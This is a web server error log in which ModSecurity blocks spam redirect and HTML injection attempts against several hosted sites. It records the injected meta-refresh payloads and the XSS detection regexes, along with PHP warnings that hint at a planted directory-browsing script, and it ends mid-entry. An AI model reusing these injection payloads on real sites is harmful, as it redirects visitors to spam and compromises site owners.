[Tue May 12 00:04:47.212845 2026] [ssl:error] [pid 1601130:tid 1601153] (EAI 2)Name or service not known: [client 158.46.201.180:39889] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:04:47.212885 2026] [ssl:error] [pid 1601130:tid 1601153] AH01941: stapling_renew_response: responder error
[Tue May 12 00:05:00.193517 2026] [security2:error] [pid 1606352:tid 1606431] [client 170.106.180.139:37438] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/gallery/mariages/"] [unique_id "agJSjHo_DFxNSZVmaX3wyAAAAMw"]
[Tue May 12 00:05:16.484574 2026] [authz_core:error] [pid 1630927:tid 1630947] [client 4.193.121.6:3000] AH01630: client denied by server configuration: proxy:http://127.0.0.1:2079/wp-content/cache/index.php
[Tue May 12 00:05:39.655485 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:59441] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/olv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://oke.zone/viewtopic.php?id=535408>urutan kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSs6FW67LJTsgN3jQutAAAAAg"]
[Tue May 12 00:05:39.658300 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:59441] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Urutan kampus Terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Urutan kampus Terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSe [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSs6FW67LJTsgN3jQutAAAAAg"]
[Tue May 12 00:05:39.660671 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:59441] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Urutan kampus Terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSs6FW67LJTsgN3jQutAAAAAg"]
[Tue May 12 00:05:39.663410 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:59441] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Urutan kampus Terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSs6FW67LJTsgN3jQutAAAAAg"]
[Tue May 12 00:05:39.665543 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:59441] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Urutan kampus Terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSs6FW67LJTsgN3jQutAAAAAg"]
[Tue May 12 00:05:39.666127 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:59441] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSs6FW67LJTsgN3jQutAAAAAg"]
[Tue May 12 00:05:39.666630 2026] [security2:error] [pid 1588898:tid 1588907] [client 194.233.64.127:59441] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJSs6FW67LJTsgN3jQutAAAAAg"]
[Tue May 12 00:05:40.297397 2026] [security2:error] [pid 1601130:tid 1601162] [client 194.233.64.127:59463] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/olv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://oke.zone/viewtopic.php?id=535408>urutan kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJStHEgAO_835W6c1m5AQAAAEw"]
[Tue May 12 00:05:40.300562 2026] [security2:error] [pid 1601130:tid 1601162] [client 194.233.64.127:59463] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Urutan kampus Terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Urutan kampus Terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSe [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJStHEgAO_835W6c1m5AQAAAEw"]
[Tue May 12 00:05:40.301651 2026] [security2:error] [pid 1601130:tid 1601162] [client 194.233.64.127:59463] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Urutan kampus Terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJStHEgAO_835W6c1m5AQAAAEw"]
[Tue May 12 00:05:40.303927 2026] [security2:error] [pid 1601130:tid 1601162] [client 194.233.64.127:59463] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Urutan kampus Terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJStHEgAO_835W6c1m5AQAAAEw"]
[Tue May 12 00:05:40.307463 2026] [security2:error] [pid 1601130:tid 1601162] [client 194.233.64.127:59463] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Urutan kampus Terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJStHEgAO_835W6c1m5AQAAAEw"]
[Tue May 12 00:05:40.308247 2026] [security2:error] [pid 1601130:tid 1601162] [client 194.233.64.127:59463] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJStHEgAO_835W6c1m5AQAAAEw"]
[Tue May 12 00:05:40.309389 2026] [security2:error] [pid 1601130:tid 1601162] [client 194.233.64.127:59463] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJStHEgAO_835W6c1m5AQAAAEw"]
[Tue May 12 00:06:35.332182 2026] [security2:error] [pid 1606352:tid 1606422] [client 43.152.72.247:33412] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/mieux-avant/"] [unique_id "agJS63o_DFxNSZVmaX3xLQAAAMM"]
[Tue May 12 00:06:46.908614 2026] [security2:error] [pid 1601130:tid 1601164] [client 43.134.100.210:34460] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/wp-comments-post.php"] [unique_id "agJS9nEgAO_835W6c1m5XAAAAE4"]
[Tue May 12 00:06:55.358509 2026] [security2:error] [pid 1588898:tid 1588920] [client 43.156.117.41:47548] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/mphb_room_type_facility/36"] [unique_id "agJS_6FW67LJTsgN3jQvMgAAABY"]
[Tue May 12 00:07:17.367286 2026] [proxy_fcgi:error] [pid 1590352:tid 1590403] [client 114.30.86.24:57840] AH01071: Got error 'Primary script unknown'
[Tue May 12 00:07:17.870812 2026] [proxy_fcgi:error] [pid 1630927:tid 1630947] [client 85.214.94.237:41746] AH01071: Got error 'Primary script unknown'
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/e6/d763a8ca9dcaa026a9fdd7669b30be4fdcb5a2 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/e6/d763a8ca9dcaa026a9fdd7669b30be4fdcb5a2 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/98/task/98/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/98/task/98/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/98/task/98/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/98/task/98/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/98/task/98/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/98/task/98/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:08:20.391390 2026] [security2:error] [pid 1606352:tid 1606425] [client 194.233.64.127:55145] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://jkjl.d8.9.adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVHo_DFxNSZVmaX3yFwAAAMY"]
[Tue May 12 00:08:20.392620 2026] [security2:error] [pid 1606352:tid 1606425] [client 194.233.64.127:55145] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 /> found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVHo_DFxNSZVmaX3yFwAAAMY"]
[Tue May 12 00:08:20.392802 2026] [security2:error] [pid 1606352:tid 1606425] [client 194.233.64.127:55145] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 /> found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSe [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVHo_DFxNSZVmaX3yFwAAAMY"]
[Tue May 12 00:08:20.393115 2026] [security2:error] [pid 1606352:tid 1606425] [client 194.233.64.127:55145] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVHo_DFxNSZVmaX3yFwAAAMY"]
[Tue May 12 00:08:20.394055 2026] [security2:error] [pid 1606352:tid 1606425] [client 194.233.64.127:55145] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag 